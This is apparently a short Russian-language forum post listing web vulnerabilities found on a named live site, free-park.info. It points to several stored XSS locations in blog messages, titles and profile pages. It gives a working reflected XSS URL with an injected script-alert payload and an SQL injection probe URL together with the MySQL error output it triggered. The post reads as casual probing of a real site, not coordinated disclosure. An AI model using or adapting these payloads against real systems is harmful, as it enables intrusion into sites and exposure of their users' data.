ещё одна
активная xss в сообщении в блоке:
http://free-park.info/_zzz/
+
http://free-park.info/_zzz/news/nid-162/index.html
+
онаже в названии походу.
http://free-park.info/blogs/top/
т.е при просмотре списка блогов - тоже вылетает алерт.
при просмотре профиля - показывается список блогов...
опятьже xss - активная.
http://free-park.info/options/view/6.html
при просмотре своих блогов тоже активная xss
http://free-park.info/options/my_blogs/
правда она доступна только тебе.. ну и пофик)
++
просто xss:
http://free-park.info/news/tid-27%22%3E%3Cscript%3Ealert(99)%3C/script%3E/index.html
++
sql inj
http://free-park.info/news/tid-27+/index.html
Код:
1064 : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1-- OR b.news_topics_subcat_id = 27 order by 1--) AND a.news_topic_id =' at line 1